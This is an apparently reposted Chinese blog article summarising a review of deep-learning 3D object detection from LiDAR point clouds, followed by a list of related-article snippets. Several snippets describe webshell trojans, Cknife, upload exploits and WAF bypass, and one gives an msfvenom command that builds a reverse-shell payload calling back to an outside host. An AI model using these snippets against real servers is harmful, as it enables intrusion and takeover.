激光雷达三维检测包含哪些内容?

article/2025/9/30 22:45:24

点击上方“小白学视觉”,选择加"星标"或“置顶

重磅干货,第一时间送达

文章导读

本文是针对一篇激光雷达三维目标检测的综述性文章的解读分析《Deep 3D Object Detection Networks Using LiDAR Data A Review》,从激光雷达的基础介绍出发,总结三维目标检测的网络设计方法,并给出模型的评估方式,最后针对一些公开问题进行探讨分析。

目录

  • 三维检测的基础介绍

  • 三维检测的算法回顾

  • 三维检测的评估指标

  • 三维检测的问题探讨

三维检测的基础介绍

1. 激光雷达的测距和扫描原理

激光雷达的主要测距方式是基于TOF:用光速乘以激光脉冲的飞行时间。

根据激光雷达的扫描方式,可以分为三种类型:

  • 机械式雷达

  • 混合式雷达

  • 固态式雷达

机械式雷达:通过在不同垂直方向上水平旋转的激光发射器实现360°扫描,不同数量的发射器可以产生不同密度的三维图像;

混合式雷达:通过调整微型镜片的角度使单脉冲激光反射到不同的方向,具有成本低、体积小的优点;

固态式雷达包括两种:

OPA激光雷达利用了相干光的原理。采用多光源阵列,通过控制激光发射的时差,在特定方向合成主光束。然后在不同方向上改变主光束相位的方向,进行全景扫描。

Flash激光雷达成像类似于相机成像。它首先向前视图发射激光,然后接收反射信号来构建视图图像。Flash激光雷达成像速度快,但受电子器件功率限制,探测距离短。

2. 点云的输出形式

点云是一些通过LiDAR扫描而得的点的集合,包含物体表面信息的特征和环境点的空间分布。每个点包含了相对传感器中心的3D坐标向量(x,y,z),和一个激光的反射强度相关的r。如下图所示:

3c1fca676135943cbe968421dd8f74b5.png

p点的坐标向量可以通过如下计算而来:

x = Lcos(ω)cos(φ)

y = Lcos(ω)sin(φ)

z = Lsin(ω)

3. 目标检测的网络结构

三维空间任意分布的原始点云,在网络处理之前通常采用视图投影或体素化将其特征化为规则格式。

和图像的目标检测一样,检测网络可以分为两类,如下图所示:

6ab1801b3a47b74bdb1e48608c1cd874.png

两阶段方法:先提出候选区域,最大限度地提高网络召回率,然后再使用细化网络提取每RoI特征向量,并预测目标分类得分以及回归到原始RoI位置的偏移量,最后通过后处理消除了重叠框。

单阶段方法:利用深度网络强大的特征学习能力,在网络的单一推理中预测对象的位置和类别。最后通过后处理消除了重叠框。

4. 三维外接框的编码方式

三维外接框表示的是目标位置、尺寸、方向属性,其编码方法主要有三种:

  • 八顶点:8个顶点的坐标(xyz),一共24个值。目标的朝向通常假定为边较长的;

  • 四顶点和两高度:为了保持边界盒顶角与底角对齐的地物的物理约束。4个定点是底面的四个点,两个高度值是底面和顶面相对地面的偏移量;根据四个角点计算四个可能的方向,并选择最近的一个作为方向向量;

  • 中心点和尺寸:7d向量表示一个3D框,中心坐标x,y,z;长宽高l,w,h;朝向角θ;

三维检测的算法回顾

点云的表征决定了三维检测网络的设计,所以根据点云的特征化方法,可以将所有的算法分为三类:

  • 基于投影的方法;

  • 基于体素的方法;

  • 基于点的方法;

1. 基于投影的方法

主要侧重在观察点云的角度上,将点云投影到2D平面中,然后再使用二维卷积网络,类似于图像平面上的目标检测。根据投影方向不同,可以分为前视投影和鸟瞰投影:

a 前视投影

二维前视图类似于圆柱形图像。每个像素都充满了几个特征通道。研究人员设计了各种统计前视特征,以充分保留点云特征,从而进一步提高目标定位和分类精度。常用的前视特性如下:

0d9c9ce7bd546e4805a82243f9d738a5.png

前视投影通常制作一个致密的2D图,使用现成的2D检测器。深度信息被编码在前视图中以获得不同视图之间的依赖关系。但是由于透视性,尺度变化和遮挡等问题带来的信息损失是其一大难点。

b 俯视投影

将三维点云压缩到x-y方向的平面空间,通常会对z方向的高度进行编码操作,转化为高度差,平均高度等信息,为了弥补降维的损失,也会去引入点云的密度信息,强度信息作为通道的叠加。

但是基于投影的方法比较依赖于2D检测算法,需要设计人工特征在2D投影中保持空间特征。但是由于投影的分辨率和特征通道影响计算效率,一些不可逆的信息损失在投影中依旧存在,并且限制着目标检测精度。

2. 基于体素的方法

主要是将不规则的点云数据格式化到一个纯矩阵中以适应卷积。3D空间被离散化到固定大小的体素栅格中。每个体素内部容纳非结构化点。体素的方式保留的原始点云数据的三维结构。但是稀疏的点云数据引入了大量的空体素。体素分辨率提高的同时,3D空间计算量程指数增长。

如何去解析稀疏体素目前有以下几种方法:

  • Efficient Localizing Object in Large 3D Voxel Space

  • Learnable Voxel Feature Encoding

  • Efficient Vertical Feature Processing

  • Optimizing Voxelization Process

  • Exploring Depth-Aware Features

  • Combining Image Features

比较经典的体素网络如VoxelNet结构:

162366c23c37d6ac1ed62491fc5afa83.png

虽然体素的方式能够在各个子空间中统计离散的特征点,但是此类建模中的稀疏表示和不可避免的计算限制了体素方法的实时性。

3. 基于点的方法

相比于前两种方法直接对点云数据建模减少信息的损失,比较经典的如PointNet系列,提出了一种统一的深度网络体系结构,直接使用不规则点来获取局部和全局点的特征,如下图所示:

2bd1c416c69458be3719188dec691938.png

大多数基于点的算法都是对PointNet系列的改造,从不规则点中获取3D特征。基于点的方法在三维检测任务中展现了强大的能力和潜力。

基于以上三种方法,论文中给出一张优缺点对比图:

fdfd0944ceb5eca5eb68752c9f830bac.png

三维检测的评估指标

检测任务中较常用的是以IoU的方式计算mAP。通过三维预测盒与三维地面真值盒的交集求出的三维IoU与阈值比较,确定检测是真阳性(TP)还是假阳性(FP)。

  • 精准度是判断为真的正例占所有判断为真的样例比重

  • 召回率是分类器中判定为真的正例占总正例的比率

单一的看精准度或者召回率都是比较片面的,可以通过P-R曲线可以用来观察模型准确度和召回率之间的平衡。

另一种评估方式是使用二维中心距离测量代替IoU,允许在3D边界框计算中解耦对象位置、大小和方向,减少在使用IoU度量时,存在TP目标不匹配的问题。

除了mAP度量之外,还测量了一组真正度量(TP度量),以量化每个TP的质量,包括盒子的位置、大小、方向、属性和速度。

TP包含了以下五个错误:

  • 平均平移误差(ATE):二维欧式中心距离;

  • 平均尺度误差(ASE):校准方向和平移后3D IoU的误差;

  • 平均方向误差(AOE):角度和GT角度之间的误差;

  • 平均速度误差(AVE):平面状态下经过L2后的速度误差;

  • 平均属性误差(AAE):1- 类别精度

公式如下:

88d10b131eba779037fb5747bc42b735.png

三维检测的问题探讨

1. 点云数据的稀疏性增加特征提取的难度

可以考虑从局部点云生成目标三维形状和形状几何的推断。或者将多层次的点特征从粗到细进行融合,保持稀疏目标特征更为详细的信息。

2. 点云之间不规则性影响搜索效率

没有拓扑关系的点云在卷积提取特征时往往不能表现出好的效果。可以考虑图卷积网络来处理原始点云,引入可学习的卷积参数对拓扑图进行优化,有利于不规则图的特征学习。

3. 是否需要融合多传感器数据

不同传感器带来的特征信息确实能够对场景进行相互补充。比如使用图像颜色和纹理特征来补充点云数据的形状特征。

较流行的方案是以点云生成三维提议框,将图像的RGB矢量、分割特征或类概率直接附加到三维空间中相应的投影点上,构造丰富的逐点输入数据。

4. 是否有必要做多任务联合训练

三维环境的感知是将多个任务协同工作,每种任务带来的信息输出是可以给其他任务作为参考,所以在多个任务之间共享特征和传输信息是值得的,可以有效提高3D目标检测的效果。

5. 是否要做复杂场景下的性能验证

实验室中的算法原型开发一般只针对特定场景或者特定数据集跑出一个很好的效果,但是真实场景下,雨、雾很容易被雷达反射,同时引入噪声点。所以在实际应用中有许多额外的因素需要考虑:

  • 检测算法是否能较鲁棒的处理噪声数据;

  • 类别的增多是否需要增加锚点引起计算压力;

  • 特殊场景的小样本数据是否会有不均衡问题;

下载1:OpenCV-Contrib扩展模块中文版教程

在「小白学视觉」公众号后台回复:扩展模块中文教程即可下载全网第一份OpenCV扩展模块教程中文版,涵盖扩展模块安装、SFM算法、立体视觉、目标跟踪、生物视觉、超分辨率处理等二十多章内容。

下载2:Python视觉实战项目52讲

在「小白学视觉」公众号后台回复:Python视觉实战项目即可下载包括图像分割、口罩检测、车道线检测、车辆计数、添加眼线、车牌识别、字符识别、情绪检测、文本内容提取、面部识别等31个视觉实战项目,助力快速学校计算机视觉。

下载3:OpenCV实战项目20讲

在「小白学视觉」公众号后台回复:OpenCV实战项目20讲即可下载含有20个基于OpenCV实现20个实战项目,实现OpenCV学习进阶。

交流群

欢迎加入公众号读者群一起和同行交流,目前有SLAM、三维视觉、传感器、自动驾驶、计算摄影、检测、分割、识别、医学影像、GAN、算法竞赛等微信群(以后会逐渐细分),请扫描下面微信号加群,备注:”昵称+学校/公司+研究方向“,例如:”张三 + 上海交大 + 视觉SLAM“。请按照格式备注,否则不予通过。添加成功后会根据研究方向邀请进入相关微信群。请勿在群内发送广告,否则会请出群,谢谢理解~

0fbedee2b7293cda592908e7d5743609.png

c2a333d0e084fba0cd8c9cfa20bd312d.png


http://chatgpt.dhexx.cn/article/kHdI6BMP.shtml

相关文章

从零开始的三维激光雷达SLAM教程第二讲(搭建Gazebo仿真环境,并添加动态障碍物)

文章目录 引言第二节:搭建仿真环境下载velodyne激光模拟功能包安装turtlebot3模拟器安装三维激光雷达到turtlebot3上构建Gazebo地图添加动态障碍物操作机器人建图最终效果 引言 毕业设计打算做三维激光SLAM,记录一些学习历程,也给后面人一点…

Cknife与一句话木马提权

Cknife:一个管理网站的工具,支持动态脚本的网站的管理,用来连接一句话木马 一句话木马:一句恶意代码,可以是某种脚本语言,用来与客户端建立联系 通过中国菜刀连接一句话木马达到拿下网站webshell

Cknife的安装

下载菜刀,打开Cknife.jar软件 注意:这里的菜刀文件存放的目录不要带有中文 打开 没错,这是我们熟悉的pikachu 但是这个网站的上传漏洞我还没学,所以暂时没法操作(等发了上传漏洞的视频我就来改) 基本思路…

cknife连接失败

这是什么原因啊

IntelliJ IDEA生成jar包运行报Error:A JNI error has occurred,please check your installation and try again

首先介绍一下IntelliJ IDEA生成jar包的方式: 1、打开项目,打开FIile->Project Structure...菜单.如下图: 选中Artifacts,点号,选择JAR,再选择From modules with dependencies...,如下图: 在打开的界面中…

dvwa 切换php版本以及phpstorm -xdebug的配置使用

最近由于需要对dvwa 进行一些更改,对php啥也不懂的我,开始研究一下php开发环境,以及具体的搭建过程; 首先是需要下载安装破解phpstorm(不多说了,下载官网地址,破解网上一堆文章) 1…

上传漏洞-一句话木马

声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容&…

[对抗训练]“中国菜刀”安装,20180222

[对抗训练]“中国菜刀”安装与使用 一、下载开源代码 从GitHub上下载开源的“中国菜刀”Java项目代码 地址:https://github.com/Chora10/Cknife压缩文件见附件1。 二、将项目存为可执行jar 打开eclipse(或其他java编辑器) 添加解压后的“中国…

我的java16和java8冲突解决办法(java版本冲突解决方法)

我的java16和java8冲突解决办 我的问题 vscode 支持java11以上burpsuite 支持java11以上cknife 只能java8JEB 只能java8全局变量设置java16的路径 对于java8 直接把只支持java8的文件目录放到java8中 在这里中用的是java8,这个目录有java文件 这个脚本可以自动隐藏窗口打开一…

msf上传文件到服务器,利用MSF技巧进入服务器

原标题:利用MSF技巧进入服务器 首先需要一台公网的机器,这是留着方便以后转发或者反弹用的. 1.生成payload的方式 msfvenom -p windows/meterpreter/reverse_tcp LHOST1.2.3.4 LPORT2333 -f exe -o 1234.exe 之后把后门复制出来上传到webshell 推荐不使用exe后缀 因…

mbp 封神台靶场 六(笔记)

打开链接,根据题目提示,flag在c盘根目录下,接上一关的网页后台,打开c盘,发现确实存在flag.txt,但是提示没有权限。 于是知道本关需要我们去进行提权操作,打开D盘,发现cmd.exe和iis6.exe&#xf…

张小白的渗透之路(五)——上传漏洞及解析漏洞详解

前言 web应用程序通常会有文件上传的功能,例如在BBS发布图片、在个人网站发布压缩包,只要web应用程序允许上传文件,就有可能存在文件上传漏洞。 上传漏洞与sql注射相比,风险更大,如果web应用程序存在上传漏洞&#xf…

Kali下常见webshell管理工具汇总

转 自 https://www.ohlinge.cn/kali/kali_webshell.html 0x01 前言 Kali Linux作为一款专为渗透测试而生的Linux操作系统,在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理,那么在Linux下面,有没有类似的工…

菜刀渗透

快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本…

无法直接打开jar文件,提示“你要以何种方式打开.jar文件”(已解决)

问题引入: 网络安全&CTF竞赛中有很多封装好的工具类似Cknife/CTFcrackTools.jar/Stegsolve.jar需要java环境打开 问题描述: .jar文件只能通过dos命令打开,点击jar文件提示你要以何种方式打开.jar文件,并且选中jdk/bin/java…

开源渗透测试工具合集

子域名枚举工具 子域枚举和信息收集工具 Anubis 项目地址:https://github.com/jonluca/Anubis使用名为 Hacking with search engine 的技术列出有关主域的子域 N4xD0rk 项目地址:https://github.com/n4xh4ck5/N4xD0rk子域名爆破枚举工具 subDomainsBrut…

DVWA的upload文件上传漏洞(全难度)(小白向)

提示:只是为了方便理解,但不一定符合您的要求 文章目录 一、等级:low 二、等级:medium 三、等级:high 四:等级:impossible 前言 靶机ip:192.168.229.145 DVWA版本:v1.…

c php乱码,Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

在现在满大街菜刀都存在后门问题的时候,Cknife横空出世了。因为开源,所以安全。因为可操作的空间挺大的,也十分适合过各种WAF。下面就是解决两个常见问题的过程。希望可以帮到各位白帽子。 但是使用过程中也遇到了一些小问题,被吐槽最多的就是…

致远OA_0day批量植Cknife马一步到位

最近各位师傅都在刷这个嘛,原本的exp是上传一个test123456.jsp的命令执行的马子,不过我在试的时候发现替换成C刀一句话出错,原因未知,并且test123456.jsp如果存在的话用原来exp是无法覆盖的。参考改进了t00ls师傅的代码(https://www.t00ls.ne…

linux 安全狗 乱码,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 相关阅读: 0x00 前言 很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实小伙伴…